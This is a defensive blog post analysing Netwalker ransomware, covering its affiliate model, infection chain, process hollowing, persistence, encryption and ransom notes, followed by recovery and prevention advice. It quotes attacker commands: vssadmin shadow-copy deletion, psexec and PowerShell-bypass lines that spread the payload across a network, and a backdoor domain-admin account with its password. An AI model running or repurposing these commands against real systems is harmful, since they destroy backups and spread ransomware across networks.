In the age of information technology, cybercriminals are developing advanced ransomware that employs sophisticated techniques to extort money — a development that constitutes a threat to everyone connected to the internet. Ransomware encrypts a victim’s files and demands a ransom for decrypting them. Ransomware attacks result in data loss and financial losses for individual users and companies, which may also suffer reputational damage. One of the latest ransomware types spreading across the world is Netwalker.
This blog post covers Netwalker and its attack methods and explains how to protect yourself against it.
What does ransomware mean? Ransomware is a type of malicious software that steals or encrypts files on an infected computer. It then demands that the victim pay a ransom to the attacker to decrypt the files and prevent stolen data from being leaked.
Cybersecurity researchers have reported that Netwalker was written in C++ by a group of Russian-speaking hackers.
It was first discovered sometime between late August and September 2019.
Netwalker is also referred to as Mailto or Koko.
The first known attacks were directed against a company in Australia and a medical company in the United States.
Netwalker compromises the network and encrypts all Windows devices connected to it using robust encryption algorithms with a near-zero probability of decryption. Netwalker operators also demand that victims pay ransoms in Bitcoin, and those ransoms are steep. If the victim balks at paying, the attackers threaten to make the stolen information public on the dark web, ratcheting up the pressure to pay.
The attackers rely on modern high-speed networks and internet connections that allow transferring large amounts of data in a short time and on encrypted network connections that are difficult to trace.
Investigators and security researchers found that the primary goal of Netwalker creators was to attack large organizations and agencies in developed countries. Netwalker attackers believe, and rightly so, that large companies have more cash than smaller ones. Downtime for large companies means higher financial losses than for smaller ones, thus making the chances higher that large companies would pay the ransoms. However, many ransomware attacks are still carried out against small companies and individual users.
Netwalker targets range across multiple industries and span the education, medical and government sectors. Netwalker attacks on healthcare organizations have already resulted in patients’ deaths because computers containing medical records and advanced medical equipment became unavailable once infected. Companies attacked by Netwalker have lost millions of dollars, while the attackers received more than USD 25 million in the first months of distributing the ransomware.
Over the past eight months, researchers have seen Netwalker transition to a ransomware-as-a-service (RaaS) delivery model, potentially opening up the platform to an increased number of enterprising cybercriminals. Currently, Netwalker operates as a closed-access RaaS portal. Under this model, Netwalker creators provide their partners, also skilled cybercriminals, with a customizable kit that makes it easier to launch attacks. These partners are granted access to the web portal hosted on the dark web, where they can design custom versions of the ransomware.
The dirty work is left to second-tier gangs, known as affiliates, who engage in the actual distribution of Netwalker and in the attacks on the victims. The shadowy group of creators also runs marketing campaigns and promotions on the dark web to recruit experienced hackers to launch attacks against large targets. Individuals with successful prior experience in hacking into business networks are preferred over rookies.
Before launching attacks, Netwalker operators usually perform due diligence on their targets, collecting such info as the name of the organization, revenue numbers, IP addresses, domain names, account names, antivirus software in use, and so on.
It is worth mentioning that the ransomware creators had imposed one significant restriction on the worm use — no attacks against Russia and its partners in the CIS (the Commonwealth of Independent States). However, Netwalker incidents were registered in those countries as well.
The creators used a packer and a unique compression format to prevent antivirus applications from detecting Netwalker. Antivirus programs assign different names to this worm once they detect it. Below is the list of Netwalker names previously identified by various antivirus applications:
Other: Malware-gen [Trj]
Trojan.PowerShell.Agent.GV
A Variant Of Generik.CMKGJSA
HEUR: Trojan.PowerShell.Generic
Trojan.Encoder.31707
Win64/Filecoder.Netwalker.A
PS/Netwalker.b
Virus.powershell.qexvmc.1
Trojan.Gen.NPE
Ransom:PowerShell/NetWalker!MTB
Trojan.PowerShell.Agent.GV
Hackers are real experts on making ransomware more harmful and more difficult to identify. In most recent attacks, Netwalker employed exe
or dll
files — a development that makes it more difficult for antivirus programs to identify this particular worm. Signs that a system has been infected include the inability to open files and launch applications, changed file icons, altered file extensions, random system freezes and so on. If you notice a high load on your disk drives for no particular reason, it’s worth checking it out because ransomware can be in the process of encrypting your files at that very moment. If you see a ransom message, it means that the computer has been infected. Read on to learn how to defeat ransomware attacks.
A ransomware analysis reveals that the primary way for Netwalker to infect your Windows-based machines is by distributing executable files (EXE) across the network.
The worm can also gain access to an individual machine and then spread to the network through phishing attacks or spam emails with an attached VBScript. The Netwalker infection can be described as taking place in stages. Below we take a closer look at the entire process.
Netwalker infects computers by using multiple methods and entryways. Below are the most popular infection methods:
To launch Netwalker attacks, operators use a set of ransomware tools with broad functionality for gaining initial access, execution (including remote code execution), privilege escalation, defense evasion, credential access, network discovery, lateral movement and so on.
Netwalker-infected EXE files can have different names. File names made of random characters (usually HEX characters) and the EXE extension are popular, for example, a5df26c1.exe or qeSw.exe. However, an infected file may be in a different format, such as WTVConverter.exe.
The following processes are launched upon the execution:
C:\Users\testuser\Desktop\a5df26c1.exe
C:\Windows\system32\explorer.exe
C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
\??\C:\Windows\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\notepad.exe "C:\Users\testuser\Desktop\A8DCE-Readme.txt" ```
As you can see, once Netwalker runs its EXE file, it deletes the shadow volume copies in silent mode to prevent the user from using built-in Windows recovery tools. Then conhost.exe connects to the Windows console application, -ForceV1, requesting the information directly from the OS kernel. Notepad is then used to write a readme file with ransomware instructions in various folders. A command to delete the shadow copies is executed using the original Explorer and the injected Explorer processes. In light of the above, machine/network users need to pay special attention to Explorer processes.
Netwalker operators also embrace sophisticated techniques to increase stealth and complicate causal analysis. One of those techniques used to inject the Netwalker payload into explorer.exe of the attacked OS is called Process Hollowing. It occurs when Netwalker creates a new explorer.exe process in a suspended state, then unmaps the process memory and replaces the actual process with the ransomware code. Once the malicious code injection has taken place, a new instance of the explorer.exe process that looks legitimate is spawned, and the original ransomware process is then killed. These tactics prevent a regular user from identifying the Netwalker process in Task Manager and Process Explorer.
One of the methods to determine whether the attackers have succeeded in injecting the Netwalker payload is checking for the presence of an unusual path belonging to the modified explorer.exe process. Such a modified process would be running as
C:\Windows\SysWOW64\explorer.exe
while the legitimate explorer.exe process must run as C:\Windows\explorer.exe.
This change of path occurs if the executable file of Netwalker is 32-bit. A 32-bit version of Explorer in a 64-bit system runs in the SysWOW64 folder.
Once the above-outlined steps have been completed and the original executable file of Netwalker deleted, a new executable file is then created in ...\AppData\Roaming\
in the user folder.
For example:
C:\Users\testuser\AppData\Roaming\a5df26c1\a5df26c1.exe
There are several reasons for the malware to be placed in this particular folder. The AppData folder has hidden attributes and is not visible to users who have not configured their system to display all files in Windows Explorer. Regular users normally do not have administrator permissions to write files in the AppData folder. They can only write and execute files in this folder. Netwalker creates new entries in the Windows registry to be invoked every time the infected computer boots.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\a5df26c1
HKLM\Software\a5df26c1\a5df26c1
After adding the keys to the Registry, Netwalker will run every time Windows starts.
Once the target organization’s network has been infiltrated, and at least one of the machines has been compromised, the attackers use a set of tools to gain lateral access to other computers on the network. User accounts with weak passwords, especially those with permissions for RDP access, and unpatched vulnerabilities serve as the gateways for escalating the attack. Hackers routinely employ various exploits, scanners, tools for brute force password cracking, antivirus removal tools, etc. One of the main targets during attacks is the Active Directory Domain Controller. There is evidence that Netwalker creates a Domain Admin account with the SQLSVC user name and gives it the password Br4pbr4p. The attackers then use the Domain Controller to execute Netwalker scripts on every reachable machine to replicate itself; for example, using psexec tool and certutil:
"psexec.exe \\host_name -d -c -f c:\programdata\rundl1.exe"
This command copies the payload across the entire network. If an earlier version is found, it is overwritten and run in stealth mode, without notifications or user input.
Specific extensions are defined in the embedded configuration file, and Netwalker will try to encrypt files with these extensions across local drives, accessible network shares as well as ‘hidden’ shares such as Admin$. It also defines the paths to be excluded from the encryption to maintain Windows OS functionality throughout the encryption process and, afterward, to demand the user to pay the ransom. The same configuration file also specifies what running processes must be killed.
Netwalker terminates running processes because it is designed to encrypt as many files as possible. If a file is used by an active process, it cannot be modified or deleted. Any remaining running processes can interact with open files, thus preventing them from being encrypted. For example, if a user is editing an XLS file in Microsoft Excel, the file cannot be deleted in Window Explorer or via CMD (command line) as long as it remains open. Netwalker uses the AES encryption algorithm to encrypt files.
Examples of file formats that are not encrypted:
exe, cmd, ps1, msi, etc.
Examples of excluded folders:
*\program files*\windows media**, *appdata*Microsoft*, **windows defender**, etc
.
Examples of processes to be terminated:
outlook.exe, oracle.exe, winword.exe, excel.exe, synctime.exe, firefox.exe, etc.
A ransom note is usually created as a text file located in the directories that contain the encrypted files.
Hi!
Your files are encrypted.
All encrypted files for this computer have extension: .a5df26c1
---
… Explanation text
---
Contact us
Don’t forget to include your code in the email:
unique_long_code
Here are some of the email addresses used to send ransom notes to victims of Netwalker:
[email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected].
Ransomware analysis has identified strings related to the ransom note template after analyzing a payload in an infected computer's memory. It has shown that an obfuscation technique is typically used, and the text is encoded by using BASE64*.
*Note: BASE64 is a binary-to-text encoding scheme that represents binary data in the text format (ASCII).
---
Contact us:
1.{mail1}
2.{mail2}
Don’t forget to include your code in the email:
{code}
As you can see, email addresses and a unique code are set as variables.
In later modifications of Netwalker, instead of sending emails, the note urges the victim to visit a webchat (some_hash_string.onion) located on the Tor network and insert the unique code in the appropriate field of the web interface.
Before starting the file encryption, Netwalker scans all available drives and network resources, attempting to locate the backup images. It starts to encrypt any found backup images after beginning the encryption process of the compromised machine. Such a sequence gives the affected user a window of opportunity, allowing them to interrupt the encryption and save at least some of the files. Suppose the user opens the note when Netwalker has already encrypted some but not all of the files. In that case, the user may see a scary-looking message demanding not to power off the machine while file encryption is in progress. It is recommended not to wait until all files are encrypted. You should power off the infected computer immediately. Then you can boot from a live rescue media (that has to write protection such as a DVD or SD flashcard) and delete the malware files using antivirus software. In this case, you might be able to rescue files that have not yet been encrypted.
Another way to distribute Netwalker and infect computers is by email. Spam and phishing emails contain macros with malicious VBScripts (Visual Basic Scripting). With the COVID-19 pandemic, Netwalker attacks came back with a vengeance. Organized gangs of cybercriminals are exploiting the public’s anxiety over the COVID-19 spread to launch phishing attacks by making them look like messages with important information or updates about COVID-19. Such emails ask potential victims to open the attached file to get the full details.
Once the harmful attachment (usually a Word or Excel document in the DOCX or XLSX formats) is opened, a VBScript is activated and infects the computer.
C:\Windows\system32\WScript.exe C:\Users\testuser\Desktop\CORONAVIRUS_COVID-19.vbs
Once activated, the behavior of Netwalker ransomware distributed via email is similar to the edition distributed as EXE files. In particular, new keys are added to the Windows registry, so Netwalker can ensure persistence and run on every system boot: HKLM/Software/ and HKCU/Software/
Volume shadow copies are deleted.
C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
A PowerShell loader script is an alternative way to infect computers. In this case, the attackers use multiple layers of obfuscation techniques to hide malicious scripts from antivirus applications, users, and researchers. One such method involves using BASE64 encoding and one-byte XOR algorithms to encrypt a script as massive two-byte arrays. Because of its ability to employ PowerShell scripts and perform DLL injection into running processes instead of using traditional executable files to infect computers, some call it “fileless ransomware”.
Two DLL files for 32-bit and 64-bit Windows versions are encoded in the byte array of the PowerShell script. The correct version is selected depending on the target operating system, then reflective DLL injection to explorer.exe is performed after resolving the needed API addresses from kernel32.dll. SHA256, CRC32 and RC4 KSA algorithms are used to encrypt Netwalker malware configuration.
Having gained access to the network, the attack operators can then launch a PowerShell batch to spread ransomware to all the available devices on the network.
An example is shown below.
for
/f %%G IN (%INPUT_FILE%) DO PsExec.exe -d \\%%G powershell -ExecutionPolicy Bypass -NoProfile -NoLogo -NoExit -File \\{redacted}\Users\{redacted}\{redacted}.ps1
As a result, the Netwalker payload is delivered and executed across the entire network. The whole process is highly automated.
Cybercriminals update their “product” before launching new attacks, so some Netwalker features and working principles may change. However, understanding how Netwalker ransomware attacks are carried out helps you protect your data against them.
Disconnect all infected computers from the network immediately. If the computer is connected to the network via an Ethernet connection, physically unplug the cable. Suppose the infected computer is connected to a Wi-Fi network. In that case, you need to power off the access point because the network management function may not work correctly on the infected computer.
Power off all infected computers. Consider shutting down all machines because they might be already infected, but their files may not have been encrypted yet.
Do NOT pay the ransom! Doing so perpetuates ransomware attacks! Besides, there is no guarantee that your files will be recovered. Remember that ransomware gangs attack hospitals, power plants and other critical infrastructure. The operation of these organizations is essential to society’s functioning, and any interruption may cause human deaths. Don’t sponsor criminals!
Prepare a rescue medium, either a DVD or a USB flash drive, or write a bootable image to an SD card as an alternative. This media must be read-only to avoid infection when it is inserted into the infected computer.
Boot from the rescue medium and remove the ransomware. You can pack Netwalker files into an archive protected with a password and send it to a digital lab specializing in ransomware analysis.
Create an image of the disks containing encrypted/corrupted files, and save the image to an external disk. You may need it later for further analysis and data recovery.
Take steps to recover deleted files by using software for the recovery of deleted files. You might be able to recover some files if the disk has not been overwritten or erased by the ransomware writing zeroes or random bits. Copy the recovered files to an external disk.
If you have a backup, recover the data from that backup. Make sure that you have deleted harmful files and that your computers are no longer infected before starting the recovery. Consider erasing the infected disks and starting full recovery because viruses can leave behind security holes or other backdoor exploits that can be activated later.
Change passwords on each affected computer. In the aftermath of an attack, we recommend changing all other passwords in your organization, including passwords for wireless networks and email accounts, etc.
Inform the authorities about the Netwalker ransomware attacks against you and your company.
The most effective strategy to prevent Netwalker ransomware attacks is twofold: having a security policy in place and performing scheduled
Here are some recommendations:
Install security patches and updates to the operating system and other applications regularly. You can configure your system to perform automatic updates.
Configure a firewall properly on your routers. Don’t leave open ports for unused services. Change standard port numbers to custom ones, if possible. Consider using port knocking.
Use strong and different passwords for all user accounts. Don’t save passwords as plain text or write on stickers and place them on monitors or other objects that can be seen by others.
Install antivirus/antimalware software on all your machines. The software must update virus signature databases regularly and always be up to date.
Configure email filters on email servers or email gateways to reject spam and suspicious emails. Take advantage of email filtering and protection capabilities of cloud email providers. For example, if you use Microsoft 365 with Outlook 365 and Exchange Online, you can use Exchange Online Protection and Advanced Threat Protection.
Network segmentation helps to limit the spread of viruses if a machine connected to the network becomes infected.
Wireless networks are more vulnerable compared to wired ones. Opt for wired networks instead.
Consider using two-factor authentication where possible.
You also need to make sure your users comply with the company’s security policy! Educate them about social engineering hacks, malicious phishing attachments and other security risks. Users should be trained to notify system administrators if they observe suspicious activities on their computers or receive email messages that look questionable.
If you happen to find a DVD disc, USB flash drive, flashcard, or other media near your office, don’t insert it into a working computer. In this case, notify users about the find and ask them to inform your system administrator. An attacker can plant an innocent-looking media near your office. This media can be configured to run a ransomware installer automatically to infect your computer and other machines on the network. A system administrator can use a machine not connected to the network, running a Linux operating system (or boot from a Linux live DVD) to examine the found media. If any malicious files are found, there is a good chance that a cyber-attack against your organization is in progress. In this case, you need to install the latest security patches, ensure that your antivirus software is up-to-date and running on all computers, make fresh backups and notify the management and users about the break-in attempt.
Configure data backups and perform them regularly. Make sure the backup repositories are not shared or accessible to other users on your network. Disconnecting your backup repositories after the backup job is finished is a good idea. You can use DVDs or Blue Ray disks to write data backups that cannot be erased. Consider using tape cartridges to prevent your data backups from being erased or encrypted by ransomware.
Your organization should enforce data backup and security policies equally. Keep in mind that even if you had your data backed up before a Netwalker attack and were able to recover it, the attackers can still leak private data that was stolen before it was encrypted by Netwalker. That’s why you should implement security measures to thwart potential attacks.
The stakes are high. The latest ransomware attacks show that ransomware is here to stay, and their incident numbers are on the rise. Netwalker ransomware attacks pose a clear and present danger that may result in human deaths and significant financial losses. Netwalker operators can steal data and publish it on the dark web. Leaked sensitive data is always a high-risk situation and can have a significant negative impact on business. Netwalker encrypts data on infected computers by using robust encryption algorithms that make it impossible to decrypt it.
The strategy to protect your network against Netwalker ransomware attacks requires organizations to have in place and enforce a viable security policy to reduce the likelihood of being infected and configure and perform regular data backups to enable quick recovery in the event of an attack.
Also published here.